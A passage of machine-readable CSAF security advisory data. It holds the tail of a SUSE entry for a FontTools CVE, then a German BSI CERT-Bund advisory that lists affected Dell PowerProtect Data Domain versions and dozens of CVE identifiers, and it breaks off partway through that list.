          "summary": "CVE-2023-45139",
          "url": "https://www.suse.com/security/cve/CVE-2023-45139"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1218748 for CVE-2023-45139",
          "url": "https://bugzilla.suse.com/1218748"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.aarch64",
            "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.ppc64le",
            "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.s390x",
            "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.x86_64",
            "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.aarch64",
            "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.ppc64le",
            "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.s390x",
            "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.x86_64",
            "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.aarch64",
            "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.ppc64le",
            "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.s390x",
            "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.x86_64",
            "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.aarch64",
            "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.ppc64le",
            "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.s390x",
            "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.aarch64",
            "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.ppc64le",
            "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.s390x",
            "openSUSE Tumbleweed:python310-FontTools-4.47.2-2.1.x86_64",
            "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.aarch64",
            "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.ppc64le",
            "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.s390x",
            "openSUSE Tumbleweed:python311-FontTools-4.47.2-2.1.x86_64",
            "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.aarch64",
            "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.ppc64le",
            "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.s390x",
            "openSUSE Tumbleweed:python312-FontTools-4.47.2-2.1.x86_64",
            "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.aarch64",
            "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.ppc64le",
            "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.s390x",
            "openSUSE Tumbleweed:python39-FontTools-4.47.2-2.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2024-06-15T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2023-45139"
    }
  ]
}
  wid-sec-w-2024-3377
Vulnerability from csaf_certbund
Notes
{
  "document": {
    "aggregate_severity": {
      "text": "mittel"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Dell PowerProtect Data Domain Appliances sind speziell f\u00fcr Backup und Daten-Deduplizierung ausgelegte Systeme.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein lokaler Angreifer kann mehrere Schwachstellen in Dell PowerProtect Data Domain ausnutzen, um seine Privilegien zu erh\u00f6hen, Informationen offenzulegen und um nicht n\u00e4her beschriebene Auswirkungen zu erzielen.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Sonstiges",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2024-3377 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3377.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2024-3377 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3377"
      },
      {
        "category": "external",
        "summary": "Dell Security Update",
        "url": "https://www.dell.com/support/kbdoc/de-de/000245360/dsa-2024-424-security-update-for-dell-pdsa-2024-424-security-update-for-dell-powerprotect-dd-vulnerabilityowerprotect-dd-vulnerability"
      },
      {
        "category": "external",
        "summary": "Security Update for Dell PowerProtect Data Domain",
        "url": "https://www.dell.com/support/kbdoc/en-us/000348708/dsa-2025-159-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities"
      }
    ],
    "source_lang": "en-US",
    "title": "Dell PowerProtect Data Domain: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2025-08-04T22:00:00.000+00:00",
      "generator": {
        "date": "2025-08-05T07:21:01.974+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.4.0"
        }
      },
      "id": "WID-SEC-W-2024-3377",
      "initial_release_date": "2024-11-07T23:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2024-11-07T23:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        },
        {
          "date": "2025-08-04T22:00:00.000+00:00",
          "number": "2",
          "summary": "Neue Updates von Dell aufgenommen"
        }
      ],
      "status": "final",
      "version": "2"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c8.1.0.0",
                "product": {
                  "name": "Dell PowerProtect Data Domain \u003c8.1.0.0",
                  "product_id": "T038861"
                }
              },
              {
                "category": "product_version",
                "name": "8.1.0.0",
                "product": {
                  "name": "Dell PowerProtect Data Domain 8.1.0.0",
                  "product_id": "T038861-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:8.1.0.0"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c7.13.1.10",
                "product": {
                  "name": "Dell PowerProtect Data Domain \u003c7.13.1.10",
                  "product_id": "T038862"
                }
              },
              {
                "category": "product_version",
                "name": "7.13.1.10",
                "product": {
                  "name": "Dell PowerProtect Data Domain 7.13.1.10",
                  "product_id": "T038862-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:7.13.1.10"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c7.10.1.40",
                "product": {
                  "name": "Dell PowerProtect Data Domain \u003c7.10.1.40",
                  "product_id": "T038863"
                }
              },
              {
                "category": "product_version",
                "name": "7.10.1.40",
                "product": {
                  "name": "Dell PowerProtect Data Domain 7.10.1.40",
                  "product_id": "T038863-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:7.10.1.40"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c7.7.5.50",
                "product": {
                  "name": "Dell PowerProtect Data Domain \u003c7.7.5.50",
                  "product_id": "T038864"
                }
              },
              {
                "category": "product_version",
                "name": "7.7.5.50",
                "product": {
                  "name": "Dell PowerProtect Data Domain 7.7.5.50",
                  "product_id": "T038864-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:7.7.5.50"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "Dell PowerProtect Data Domain",
                "product": {
                  "name": "Dell PowerProtect Data Domain",
                  "product_id": "T045852",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:-"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "PowerProtect Data Domain"
          },
          {
            "category": "product_name",
            "name": "Dell PowerProtect Data Domain Management Center",
            "product": {
              "name": "Dell PowerProtect Data Domain Management Center",
              "product_id": "T045853",
              "product_identification_helper": {
                "cpe": "cpe:/a:dell:powerprotect_data_domain_management_center:-"
              }
            }
          },
          {
            "category": "product_name",
            "name": "Dell PowerProtect Data Domain OS",
            "product": {
              "name": "Dell PowerProtect Data Domain OS",
              "product_id": "T045854",
              "product_identification_helper": {
                "cpe": "cpe:/o:dell:powerprotect_data_domain_os:-"
              }
            }
          }
        ],
        "category": "vendor",
        "name": "Dell"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-45759",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-45759"
    },
    {
      "cve": "CVE-2024-48010",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-48010"
    },
    {
      "cve": "CVE-2024-48011",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-48011"
    },
    {
      "cve": "CVE-2017-16829",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2017-16829"
    },
    {
      "cve": "CVE-2017-5849",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2017-5849"
    },
    {
      "cve": "CVE-2018-7208",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2018-7208"
    },
    {
      "cve": "CVE-2019-14889",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2019-14889"
    },
    {
      "cve": "CVE-2020-12912",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-12912"
    },
    {
      "cve": "CVE-2020-16135",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-16135"
    },
    {
      "cve": "CVE-2020-1730",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-1730"
    },
    {
      "cve": "CVE-2020-24455",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-24455"
    },
    {
      "cve": "CVE-2020-8694",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-8694"
    },
    {
      "cve": "CVE-2020-8695",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-8695"
    },
    {
      "cve": "CVE-2021-27219",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2021-27219"
    },
    {
      "cve": "CVE-2021-3565",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2021-3565"
    },
    {
      "cve": "CVE-2021-3634",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2021-3634"
    },
    {
      "cve": "CVE-2022-1210",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-1210"
    },
    {
      "cve": "CVE-2022-1622",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-1622"
    },
    {
      "cve": "CVE-2022-1996",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-1996"
    },
    {
      "cve": "CVE-2022-22576",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-22576"
    },
    {
      "cve": "CVE-2022-25313",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-25313"
    },
    {
      "cve": "CVE-2022-27774",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27774"
    },
    {
      "cve": "CVE-2022-27775",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27775"
    },
    {
      "cve": "CVE-2022-27776",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27776"
    },
    {
      "cve": "CVE-2022-27781",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27781"
    },
    {
      "cve": "CVE-2022-27782",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27782"
    },
    {
      "cve": "CVE-2022-29361",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-29361"
    },
    {
      "cve": "CVE-2022-32205",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32205"
    },
    {
      "cve": "CVE-2022-32206",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32206"
    },
    {
      "cve": "CVE-2022-32207",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32207"
    },
    {
      "cve": "CVE-2022-32208",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32208"
    },
    {
      "cve": "CVE-2022-32221",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32221"
    },
    {
      "cve": "CVE-2022-35252",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-35252"
    },
    {
      "cve": "CVE-2022-40023",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-40023"
    },
    {
      "cve": "CVE-2022-40090",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-40090"
    },
    {
      "cve": "CVE-2022-42915",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-42915"
    },
    {
      "cve": "CVE-2022-42916",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-42916"
    },
    {
      "cve": "CVE-2022-43551",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-43551"
    },
    {
      "cve": "CVE-2022-43552",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-43552"
    },
    {
      "cve": "CVE-2022-4603",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-4603"
    },
    {
      "cve": "CVE-2022-48064",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-48064"
    },
    {
      "cve": "CVE-2022-48624",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-48624"
    },
    {
      "cve": "CVE-2023-0461",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-0461"
    },
    {
      "cve": "CVE-2023-1667",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-1667"
    },
    {
      "cve": "CVE-2023-1916",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-1916"
    },
    {
      "cve": "CVE-2023-20592",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-20592"
    },
    {
      "cve": "CVE-2023-2137",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-2137"
    },
    {
      "cve": "CVE-2023-22745",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-22745"
    },
    {
      "cve": "CVE-2023-2283",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-2283"
    },
    {
      "cve": "CVE-2023-23914",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-23914"
    },
    {
      "cve": "CVE-2023-23915",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-23915"
    },
    {
      "cve": "CVE-2023-23916",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-23916"
    },
    {
      "cve": "CVE-2023-23934",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-23934"
    },
    {
      "cve": "CVE-2023-25577",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-25577"
    },
    {
      "cve": "CVE-2023-26965",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-26965"
    },
    {
      "cve": "CVE-2023-27043",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27043"
    },
    {
      "cve": "CVE-2023-2731",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-2731"
    },
    {
      "cve": "CVE-2023-27533",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27533"
    },
    {
      "cve": "CVE-2023-27534",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27534"
    },
    {
      "cve": "CVE-2023-27535",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27535"
    },
    {
      "cve": "CVE-2023-27536",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27536"
    },
    {
      "cve": "CVE-2023-27538",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-27538"
    },
    {
      "cve": "CVE-2023-28319",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-28319"
    },
    {
      "cve": "CVE-2023-28320",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-28320"
    },
    {
      "cve": "CVE-2023-28321",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-28321"
    },
    {
      "cve": "CVE-2023-28322",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-28322"
    },
    {
      "cve": "CVE-2023-31083",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-31083"
    },
    {
      "cve": "CVE-2023-34055",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-34055"
    },
    {
      "cve": "CVE-2023-35116",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-35116"
    },
    {
      "cve": "CVE-2023-38286",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38286"
    },
    {
      "cve": "CVE-2023-38469",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38469"
    },
    {
      "cve": "CVE-2023-38471",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38471"
    },
    {
      "cve": "CVE-2023-38472",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38472"
    },
    {
      "cve": "CVE-2023-38545",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38545"
    },
    {
      "cve": "CVE-2023-38546",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
